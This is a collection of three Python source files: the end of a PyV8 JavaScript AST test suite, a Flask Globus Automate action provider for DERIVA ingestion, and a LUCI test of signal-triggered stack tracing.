self.assertFalse(stmt.fastLoop)
def onForInStatement(self, stmt):
self.called.append('forIn')
self.assertEqual("{ out += name; }", str(stmt.body))
self.assertEqual("name", str(stmt.each))
self.assertEqual("names", str(stmt.enumerable))
def onWhileStatement(self, stmt):
self.called.append('while')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
def onDoWhileStatement(self, stmt):
self.called.append('doWhile')
self.assertEqual("{ i += 1; }", str(stmt.body))
self.assertEqual("(i < 10)", str(stmt.condition))
self.assertEqual(281, stmt.conditionPos)
with ForStatementChecker(self) as checker:
self.assertEqual(['for', 'forIn', 'while', 'doWhile'], checker.test("""
var i, j;
for (i=0; i<10; i++) { j+=i; }
var names = new Array();
var out = '';
for (name in names) { out += name; }
while (i<10) { i += 1; }
do { i += 1; } while (i<10);
"""))
def testCallStatements(self):
class CallStatementChecker(TestAST.Checker):
def onVariableDeclaration(self, decl):
self.called.append('var')
var = decl.proxy
if var.name == 's':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(var.isValidLeftHandSide)
self.assertFalse(var.isArguments)
self.assertFalse(var.isThis)
def onFunctionDeclaration(self, decl):
self.called.append('func')
var = decl.proxy
if var.name == 'hello':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function hello(name) { s = ("Hello " + name); })', str(decl.function))
elif var.name == 'dog':
self.assertEqual(AST.VarMode.var, decl.mode)
self.assertTrue(decl.function)
self.assertEqual('(function dog(name) { (this).name = name; })', str(decl.function))
def onCall(self, expr):
self.called.append('call')
self.assertEqual("hello", str(expr.expression))
self.assertEqual(['"flier"'], [str(arg) for arg in expr.args])
self.assertEqual(159, expr.pos)
def onCallNew(self, expr):
self.called.append('callNew')
self.assertEqual("dog", str(expr.expression))
self.assertEqual(['"cat"'], [str(arg) for arg in expr.args])
self.assertEqual(191, expr.pos)
def onCallRuntime(self, expr):
self.called.append('callRuntime')
self.assertEqual("InitializeVarGlobal", expr.name)
self.assertEqual(['"s"', '0'], [str(arg) for arg in expr.args])
self.assertFalse(expr.isJsRuntime)
with CallStatementChecker(self) as checker:
self.assertEqual(['var', 'func', 'func', 'callRuntime', 'call', 'callNew'], checker.test("""
var s;
function hello(name) { s = "Hello " + name; }
function dog(name) { this.name = name; }
hello("flier");
new dog("cat");
"""))
def testTryStatements(self):
class TryStatementsChecker(TestAST.Checker):
def onThrow(self, expr):
self.called.append('try')
self.assertEqual('"abc"', str(expr.exception))
self.assertEqual(66, expr.pos)
def onTryCatchStatement(self, stmt):
self.called.append('catch')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
stmt.tryBlock.visit(self)
self.assertEqual("err", str(stmt.variable.name))
self.assertEqual("{ s = err; }", str(stmt.catchBlock))
def onTryFinallyStatement(self, stmt):
self.called.append('finally')
self.assertEqual("{ throw \"abc\"; }", str(stmt.tryBlock))
#FIXME self.assertEqual([], stmt.targets)
self.assertEqual("{ s += \".\"; }", str(stmt.finallyBlock))
with TryStatementsChecker(self) as checker:
self.assertEqual(['catch', 'try', 'finally'], checker.test("""
var s;
try {
throw "abc";
}
catch (err) {
s = err;
};
try {
throw "abc";
}
finally {
s += ".";
}
"""))
def testLiterals(self):
class LiteralChecker(TestAST.Checker):
def onCallRuntime(self, expr):
expr.args[1].visit(self)
def onLiteral(self, litr):
self.called.append('literal')
self.assertFalse(litr.isPropertyName)
self.assertFalse(litr.isNull)
self.assertFalse(litr.isTrue)
def onRegExpLiteral(self, litr):
self.called.append('regex')
self.assertEqual("test", litr.pattern)
self.assertEqual("g", litr.flags)
def onObjectLiteral(self, litr):
self.called.append('object')
self.assertEqual('constant:"name"="flier",constant:"sex"=true',
",".join(["%s:%s=%s" % (prop.kind, prop.key, prop.value) for prop in litr.properties]))
def onArrayLiteral(self, litr):
self.called.append('array')
self.assertEqual('"hello","world",42',
",".join([str(value) for value in litr.values]))
with LiteralChecker(self) as checker:
self.assertEqual(['literal', 'regex', 'literal', 'literal'], checker.test("""
false;
/test/g;
var o = { name: 'flier', sex: true };
var a = ['hello', 'world', 42];
"""))
def testOperations(self):
class OperationChecker(TestAST.Checker):
def onUnaryOperation(self, expr):
self.called.append('unaryOp')
self.assertEqual(AST.Op.BIT_NOT, expr.op)
self.assertEqual("i", expr.expression.name)
#print "unary", expr
def onIncrementOperation(self, expr):
self.fail()
def onBinaryOperation(self, expr):
self.called.append('binOp')
self.assertEqual(AST.Op.ADD, expr.op)
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
self.assertEqual(36, expr.pos)
#print "bin", expr
def onAssignment(self, expr):
self.called.append('assign')
self.assertEqual(AST.Op.ASSIGN_ADD, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual("i", str(expr.target))
self.assertEqual("1", str(expr.value))
self.assertEqual(53, expr.pos)
self.assertEqual("(i + 1)", str(expr.binOperation))
self.assertTrue(expr.compound)
def onCountOperation(self, expr):
self.called.append('countOp')
self.assertFalse(expr.prefix)
self.assertTrue(expr.postfix)
self.assertEqual(AST.Op.INC, expr.op)
self.assertEqual(AST.Op.ADD, expr.binop)
self.assertEqual(71, expr.pos)
self.assertEqual("i", expr.expression.name)
#print "count", expr
def onCompareOperation(self, expr):
self.called.append('compOp')
if len(self.called) == 4:
self.assertEqual(AST.Op.EQ, expr.op)
self.assertEqual(88, expr.pos) # i==j
else:
self.assertEqual(AST.Op.EQ_STRICT, expr.op)
self.assertEqual(106, expr.pos) # i===j
self.assertEqual("i", str(expr.left))
self.assertEqual("j", str(expr.right))
#print "comp", expr
def onConditional(self, expr):
self.called.append('conditional')
self.assertEqual("(i > j)", str(expr.condition))
self.assertEqual("i", str(expr.thenExpr))
self.assertEqual("j", str(expr.elseExpr))
self.assertEqual(144, expr.thenExprPos)
self.assertEqual(146, expr.elseExprPos)
with OperationChecker(self) as checker:
self.assertEqual(['binOp', 'assign', 'countOp', 'compOp', 'compOp', 'unaryOp', 'conditional'], checker.test("""
var i, j;
i+j;
i+=1;
i++;
i==j;
i===j;
~i;
i>j?i:j;
"""))
def testSwitchStatement(self):
class SwitchStatementChecker(TestAST.Checker):
def onSwitchStatement(self, stmt):
self.called.append('switch')
self.assertEqual('expr', stmt.tag.name)
self.assertEqual(2, len(stmt.cases))
case = stmt.cases[0]
self.assertFalse(case.isDefault)
self.assertTrue(case.label.isString)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(57, case.position)
self.assertEqual(1, len(case.statements))
case = stmt.cases[1]
self.assertTrue(case.isDefault)
self.assertEqual(None, case.label)
self.assertEqual(0, case.bodyTarget.pos)
self.assertEqual(109, case.position)
self.assertEqual(1, len(case.statements))
with SwitchStatementChecker(self) as checker:
self.assertEqual(['switch'], checker.test("""
switch (expr) {
case 'flier':
break;
default:
break;
}
"""))
if __name__ == '__main__':
if "-v" in sys.argv:
level = logging.DEBUG
else:
level = logging.WARN
if "-p" in sys.argv:
sys.argv.remove("-p")
print("Press any key to continue or attach process #%d..." % os.getpid())
input()
logging.basicConfig(level=level, format='%(asctime)s %(levelname)s %(message)s')
logging.info("testing PyV8 module %s with V8 v%s", __version__, JSEngine.version)
unittest.main()
|
api.py
|
from datetime import datetime, timedelta, timezone
import logging.config
import multiprocessing
from flask import Flask, jsonify, request
from globus_action_provider_tools.authentication import TokenChecker
from globus_action_provider_tools.validation import (
request_validator,
response_validator
)
from isodate import duration_isoformat, parse_duration, parse_datetime
import jsonschema
from openapi_core.wrappers.flask import FlaskOpenAPIResponse, FlaskOpenAPIRequest
import cfde_ap.auth
from cfde_ap import CONFIG
from . import actions, error as err, utils
# Flask setup
app = Flask(__name__)
app.config.from_mapping(**CONFIG)
app.url_map.strict_slashes = False
# Logging setup
logging.config.dictConfig(CONFIG["LOGGING"])
logger = logging.getLogger(__name__)
logger.info("\n\n==========CFDE Action Provider started==========\n")
# Globals specific to this instance
TBL = CONFIG["DYNAMO_TABLE"]
ROOT = "/" # Segregate different APs by root path?
TOKEN_CHECKER = TokenChecker(CONFIG["GLOBUS_CC_APP"], CONFIG["GLOBUS_SECRET"],
[CONFIG["GLOBUS_SCOPE"]], CONFIG["GLOBUS_AUD"])
# Clean up environment
utils.clean_environment()
utils.initialize_dmo_table(CONFIG["DYNAMO_TABLE"])
#######################################
# Flask helpers
#######################################
@app.errorhandler(err.ApiError)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status
return response
@app.before_request
def before_request():
# Service alive check can skip validation
if request.path == "/ping":
return {"success": True}
wrapped_req = FlaskOpenAPIRequest(request)
validation_result = request_validator.validate(wrapped_req)
if validation_result.errors:
raise err.InvalidRequest("; ".join([str(e) for e in validation_result.errors]))
token = request.headers.get("Authorization", "").replace("Bearer ", "")
auth_state = TOKEN_CHECKER.check_token(token)
if not auth_state.identities:
# Return auth errors for debugging - may change in prod for security
raise err.NoAuthentication("; ".join([str(e) for e in auth_state.errors]))
request.auth = auth_state
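# Callers authenticate with a Globus bearer token, e.g. (hedged illustration,
# host and token are placeholders):
#   curl -H "Authorization: Bearer <access-token>" https://<host>/run -d '{...}'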
@app.after_request
def after_request(response):
wrapped_req = FlaskOpenAPIRequest(request)
wrapped_resp = FlaskOpenAPIResponse(response)
validation_result = response_validator.validate(wrapped_req, wrapped_resp)
if validation_result.errors:
logger.error("Error on response: {}, {}"
.format(response.response, validation_result.errors))
raise err.DeveloperError("; ".join([str(e) for e in validation_result.errors]))
return response
#######################################
# API Routes
#######################################
@app.route(ROOT, methods=["GET"])
def meta():
resp = {
"types": ["Action"],
"api_version": "1.0",
"globus_auth_scope": CONFIG["GLOBUS_SCOPE"],
"title": "CFDE Demo Deriva Ingest",
"subtitle": ("A Globus Automate Action Provider to demonstrate ingestion "
"of a properly-formatted BDBag into DERIVA."),
# "description": "",
# "keywords": [],
"visible_to": ["all_authenticated_users"],
"runnable_by": ["urn:globus:groups:id:" + CONFIG["GLOBUS_GROUP"]],
# "administered_by": [],
# "admin_contact": "",
"synchronous": False,
"log_supported": False,
# "maximum_deadline": "",
"input_schema": CONFIG["INPUT_SCHEMA"],
# "event_types": [], # Event-type providers only
}
if not request.auth.check_authorization(resp["visible_to"],
allow_all_authenticated_users=True):
raise err.NotAuthorized("You cannot view this Action Provider.")
return jsonify(resp)
@app.route(ROOT+"run", methods=["POST"])
def run():
req = request.get_json(force=True)
# Validate input
body = req.get("body", {})
try:
jsonschema.validate(body, CONFIG["INPUT_SCHEMA"])
except jsonschema.ValidationError as e:
# Raise just the first line of the exception text, which contains the error
# The entire body and schema are in the exception, which are too verbose
raise err.InvalidRequest(str(e).split("\n")[0])
# Must have data_url if ingest or restore
if body["operation"] in ["ingest", "restore"] and not body.get("data_url"):
raise err.InvalidRequest("You must provide a data_url to ingest or restore.")
# If request_id has been submitted before, return status instead of starting new
try:
status = utils.read_action_by_request(TBL, req["request_id"])
# Otherwise, create new action
except err.NotFound:
# TODO: Accurately estimate completion time
estimated_completion = datetime.now(tz=timezone.utc) + timedelta(days=1)
default_release_after = timedelta(days=30)
job = {
# Start job as ACTIVE - no "waiting" status
"status": "ACTIVE",
# Default these to the principals of whoever is running this action:
"manage_by": request.auth.identities,
"monitor_by": request.auth.identities,
"creator_id": request.auth.effective_identity,
"release_after": default_release_after,
"request_id": req["request_id"]
}
if "label" in req:
job["label"] = req["label"]
# Allow overriding by the request:
if "manage_by" in req:
job["manage_by"] = req["manage_by"]
if "monitor_by" in req:
job["monitor_by"] = req["monitor_by"]
if "release_after" in req:
job["release_after"] = parse_duration(req["release_after"]).tdelta
if "deadline" in req:
deadline = parse_datetime(req["deadline"])
if deadline < estimated_completion:
raise err.InvalidRequest(
f"Processing likely to exceed deadline of {req['deadline']}"
)
# Correct types for JSON serialization and DynamoDB ingest
if isinstance(job["manage_by"], str):
job["manage_by"] = [job["manage_by"]]
else:
job["manage_by"] = list(job["manage_by"])
if isinstance(job["monitor_by"], str):
job["monitor_by"] = [job["monitor_by"]]
else:
job["monitor_by"] = list(job["monitor_by"])
# Standardize datetime to ISO format
job["release_after"] = duration_isoformat(job["release_after"])
# Create status in database (creates action_id)
job = utils.create_action_status(TBL, job)
# start_action() blocks, throws exception on failure, returns on success
start_action(job["action_id"], req["body"])
res = jsonify(utils.translate_status(job))
res.status_code = 202
return res
else:
return jsonify(utils.translate_status(status))
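# A hedged sketch of exercising this route with Flask's test client; the token
# and the body fields beyond "operation"/"data_url" are assumptions made only
# for illustration:
#
#   with app.test_client() as client:
#       resp = client.post("/run",
#                          headers={"Authorization": "Bearer <access-token>"},
#                          json={"request_id": "example-0001",
#                                "body": {"operation": "ingest",
#                                         "data_url": "https://example.org/sub.bdbag.zip"}})
#       assert resp.status_code in (200, 202)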
@app.route(ROOT+"<action_id>/status", methods=["GET"])
def status(action_id):
status = utils.read_action_status(TBL, action_id)
if not request.auth.check_authorization(status["monitor_by"]):
raise err.NotAuthorized("You cannot view the status of action {}".format(action_id))
return jsonify(utils.translate_status(status))
@app.route(ROOT+"<action_id>/cancel", methods=["POST"])
def cancel(action_id):
status = utils.read_action_status(TBL, action_id)
if not request.auth.check_authorization(status["manage_by"]):
raise err.NotAuthorized("You cannot cancel action {}".format(action_id))
clean_status = utils.translate_status(status)
if clean_status["status"] in ["SUCCEEDED", "FAILED"]:
raise err.InvalidState("Action {} already completed".format(action_id))
cancel_action(action_id)
new_status = utils.read_action_status(TBL, action_id)
return jsonify(utils.translate_status(new_status))
@app.route(ROOT+"<action_id>/release", methods=["POST"])
def release(action_id):
status = utils.read_action_status(TBL, action_id)
if not request.auth.check_authorization(status["manage_by"]):
raise err.NotAuthorized("You cannot cancel action {}".format(action_id))
clean_status = utils.translate_status(status)
if clean_status["status"] in ["ACTIVE", "INACTIVE"]:
raise err.InvalidState("Action {} not completed and cannot be released".format(action_id))
utils.delete_action_status(TBL, action_id)
return clean_status
#######################################
# Synchronous events
#######################################
def start_action(action_id, action_data):
# Process keyword catalog ID
if action_data.get("catalog_id") in CONFIG["KNOWN_CATALOGS"].keys():
catalog_info = CONFIG["KNOWN_CATALOGS"][action_data["catalog_id"]]
action_data["catalog_id"] = catalog_info["catalog_id"]
# Server must either not be provided, or must match catalog_info exactly
if not action_data.get("server"):
action_data["server"] = catalog_info["server"]
elif action_data["server"] != catalog_info["server"]:
raise ValueError(f"Server '{action_data['server']}' does not match server for "
f"catalog '{action_data['catalog_id']}' ({catalog_info['server']})")
# Ingest Action
elif action_data["operation"] == "ingest":
logger.info(f"{action_id}: Starting Deriva ingest into "
f"{action_data.get('catalog_id', 'new catalog')}")
# Spawn new process
deriva_webauthn_user = cfde_ap.auth.get_webauthn_user()
args = (action_id, action_data["data_url"], deriva_webauthn_user, action_data.get("globus_ep"),
action_data.get("server"), action_data.get("dcc_id"))
driver = multiprocessing.Process(target=action_ingest, args=args, name=action_id)
driver.start()
else:
raise err.InvalidRequest("Operation '{}' unknown".format(action_data["operation"]))
return
def cancel_action(action_id):
# This action doesn't implement cancellation,
# which is valid according to the Automate spec.
# This is a stub in case cancellation is implemented later.
return
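# A minimal sketch of what cancellation could look like if it were implemented,
# assuming the ingest subprocess keeps the action_id as its process name (as
# start_action sets it above); illustrative only, not wired into the route:
#
#   def cancel_action(action_id):
#       for proc in multiprocessing.active_children():
#           if proc.name == action_id:
#               proc.terminate()
#       utils.update_action_status(TBL, action_id, {
#           "status": "FAILED",
#           "details": {"error": "Cancelled by user"}
#       })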
#######################################
# Asynchronous actions
#######################################
def action_ingest(action_id, url, deriva_webauthn_user, globus_ep=None, servername=None, dcc_id=None):
# Download ingest BDBag
# Excessive try-except blocks because there's (currently) no process management;
# if the action fails, it needs to always self-report failure
if not servername:
servername = CONFIG["DEFAULT_SERVER_NAME"]
# Ingest into Deriva
logger.debug(f"{action_id}: Ingesting into Deriva")
try:
ingest_res = actions.deriva_ingest(servername, url, deriva_webauthn_user,
dcc_id=dcc_id, globus_ep=globus_ep, action_id=action_id)
if not ingest_res["success"]:
error_status = {
"status": "FAILED",
"details": {
"error": f"Unable to ingest to DERIVA: {ingest_res.get('error')}"
}
}
utils.update_action_status(TBL, action_id, error_status)
return
catalog_id = ingest_res["catalog_id"]
except Exception as e:
logger.exception(e)
error_status = {
"status": "FAILED",
"details": {
"error": f"Error ingesting to DERIVA: {str(e)}"
}
}
logger.error(f"{action_id}: Error ingesting to DERIVA: {repr(e)}")
try:
utils.update_action_status(TBL, action_id, error_status)
except Exception as e2:
with open("ERROR.log", 'w') as out:
out.write(f"Error updating status on {action_id}: '{repr(e2)}'\n\n"
f"After error '{repr(e)}'")
return
# Successful ingest
logger.debug(f"{action_id}: Catalog {dcc_id} populated")
status = {
"status": "SUCCEEDED",
"details": {
"deriva_id": catalog_id,
# "number_ingested": insert_count,
"deriva_link": ingest_res["catalog_url"],
"message": "DERIVA ingest successful",
"error": False
}
}
try:
utils.update_action_status(TBL, action_id, status)
except Exception as e:
with open("ERROR.log", 'w') as out:
out.write(f"Error updating status on {action_id}: '{repr(e)}'\n\n"
f"After success on ID '{catalog_id}'")
# Remove ingested files from disk
# Failed ingests are not removed, which helps debugging
return
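# Hedged convenience entry point for local testing; a deployment presumably
# serves this app from a WSGI server rather than the Flask development server.
if __name__ == "__main__":
    app.run(host="127.0.0.1", port=5000)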
|
signal_trace_test.py
|
#!/usr/bin/env vpython3
# Copyright 2017 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import logging
import os
import signal
import subprocess
import sys
import unittest
import six
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
@unittest.skipIf(
sys.platform == 'win32',
'This test is for platforms other than Windows')
class Test(unittest.TestCase):
def _run(self, cmd, sig, stdin):
p = subprocess.Popen([sys.executable, '-u', '-c', cmd],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=THIS_DIR)
p.stdout.read(1)
os.kill(p.pid, sig)
# Wait for some output before calling stdin.write(), otherwise there's a
# race condition with SIGUSR2.
e = p.stderr.read(1)
if stdin:
p.stdin.write(stdin)
p.stdin.flush()
p.wait()
e += p.stderr.read()
out = p.stdout.read()
p.stdin.close()
p.stdout.close()
p.stderr.close()
return out, e
def test_SIGUSR1(self):
# The simple case
cmd = ('import signal_trace,sys,time; signal_trace.register(); '
'sys.stdout.write("1"); sys.stdout.flush(); time.sleep(60)')
out, err = self._run(cmd, signal.SIGUSR1, None)
self.assertEqual(b'', out)
self.assertEqual(
b'ERROR:root:\n'
b'** SIGUSR1 received **\n'
b'MainThread:\n'
b' File "<string>", line 1, in <module>\n'
b'** SIGUSR1 end **\n', err)
def test_SIGUSR1_threads(self):
# The multithreaded case.
cmd = ('import signal_trace,sys,time,threading; signal_trace.register(); '
't=threading.Thread(target=time.sleep, args=(60,), name="Awesome"); '
't.daemon=True; t.start(); '
'sys.stdout.write("1"); sys.stdout.flush(); time.sleep(60)')
out, err = self._run(cmd, signal.SIGUSR1, None)
self.assertEqual(b'', out)
self.assertTrue(
err.startswith(b'ERROR:root:\n** SIGUSR1 received **\nAwesome:\n '),
repr(err))
self.assertTrue(err.endswith(b'\n** SIGUSR1 end **\n'), repr(err))
self.assertIn(b'MainThread:', err.splitlines())
def test_SIGUSR2(self):
cmd = ('import signal_trace,sys,time; signal_trace.register(); '
'sys.stdout.write("1"); sys.stdout.flush(); time.sleep(60)')
out, err = self._run(cmd, signal.SIGUSR2, b'exit()\n')
self.assertEqual(b'>>> ', out)
self.assertTrue(
err.startswith(
b'Signal received : entering python shell.\nTraceback:\n'),
repr(err))
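# Typical registration mirrors the inline commands above (hedged sketch):
#
#   import signal_trace
#   signal_trace.register()
#   ...  # long-running work; `kill -USR1 <pid>` logs every thread's stack,
#        # and `kill -USR2 <pid>` drops the process into an interactive shell.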
if __name__ == '__main__':
os.chdir(THIS_DIR)
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
logging.basicConfig(
level=logging.DEBUG if '-v' in sys.argv else logging.CRITICAL)
unittest.main()
|